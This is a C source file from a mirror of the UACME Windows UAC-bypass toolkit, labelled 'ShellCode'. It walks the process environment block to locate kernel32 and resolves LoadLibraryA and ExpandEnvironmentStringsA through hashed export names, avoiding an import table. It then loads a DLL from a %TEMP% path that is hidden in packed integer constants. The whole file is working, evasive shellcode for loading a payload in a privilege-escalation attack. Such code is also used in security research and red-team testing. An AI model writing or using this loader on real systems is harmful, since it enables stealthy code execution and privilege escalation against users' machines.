mirror of https://github.com/hfiref0x/UACME.git
93 lines
2.9 KiB
C
93 lines
2.9 KiB
C
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2015
|
|
*
|
|
* TITLE: MAIN.C
|
|
*
|
|
* VERSION: 1.90
|
|
*
|
|
* DATE: 16 Sept 2015
|
|
*
|
|
* ShellCode.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
|
|
//disable nonmeaningful warnings.
|
|
#pragma warning(disable: 4005) // macro redefinition
|
|
|
|
#include <Windows.h>
|
|
#include "..\Shared\ntos.h"
|
|
|
|
#if (_MSC_VER >= 1900)
|
|
#ifdef _DEBUG
|
|
#pragma comment(lib, "vcruntimed.lib")
|
|
#pragma comment(lib, "ucrtd.lib")
|
|
#else
|
|
#pragma comment(lib, "libvcruntime.lib")
|
|
#endif
|
|
#endif
|
|
|
|
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
|
|
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
|
|
|
|
DWORD gethash(char *s)
|
|
{
|
|
DWORD h = 0;
|
|
|
|
while (*s != 0) {
|
|
h ^= *s;
|
|
h = RotateLeft32(h, 3) + 1;
|
|
s++;
|
|
}
|
|
|
|
return h;
|
|
}
|
|
|
|
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
|
|
{
|
|
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
|
|
PIMAGE_FILE_HEADER fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
|
|
PIMAGE_OPTIONAL_HEADER popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
|
|
DWORD ETableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
|
|
PIMAGE_EXPORT_DIRECTORY pexp = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosh + ETableVA);
|
|
PDWORD names = (PDWORD)((PBYTE)dosh + pexp->AddressOfNames), functions = (PDWORD)((PBYTE)dosh + pexp->AddressOfFunctions);
|
|
PWORD ordinals = (PWORD)((PBYTE)dosh + pexp->AddressOfNameOrdinals);
|
|
DWORD_PTR c, fp;
|
|
|
|
for (c = 0; c < pexp->NumberOfNames; c++) {
|
|
if (gethash((char *)((PBYTE)dosh + names[c])) == hash) {
|
|
fp = functions[ordinals[c]];
|
|
return (PBYTE)Module + fp;
|
|
}
|
|
}
|
|
|
|
return NULL;
|
|
}
|
|
|
|
void main()
|
|
{
|
|
PTEB teb = (PTEB)__readfsdword(0x18);
|
|
PPEB peb = teb->ProcessEnvironmentBlock;
|
|
PLDR_DATA_TABLE_ENTRY ldre0 = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InLoadOrderModuleList.Flink;
|
|
pfnLoadLibraryA xLoadLibraryA;
|
|
pfnExpandEnvironmentStringsA xExpandEnvironmentStringsA;
|
|
CHAR libpath[MAX_PATH], c;
|
|
DWORD textbuf[3] = {
|
|
'PMT%', '3r\\%', 0
|
|
};
|
|
|
|
for (c = 0; c < 2; c++)
|
|
ldre0 = (PLDR_DATA_TABLE_ENTRY)ldre0->InLoadOrderLinks.Flink;
|
|
|
|
xExpandEnvironmentStringsA = (pfnExpandEnvironmentStringsA)rawGetProcAddress(ldre0->DllBase, 0xf53890a2);
|
|
xLoadLibraryA = (pfnLoadLibraryA)rawGetProcAddress(ldre0->DllBase, 0x69b37e08);
|
|
|
|
xExpandEnvironmentStringsA((char *)&textbuf, libpath, sizeof(libpath));
|
|
xLoadLibraryA(libpath);
|
|
}
|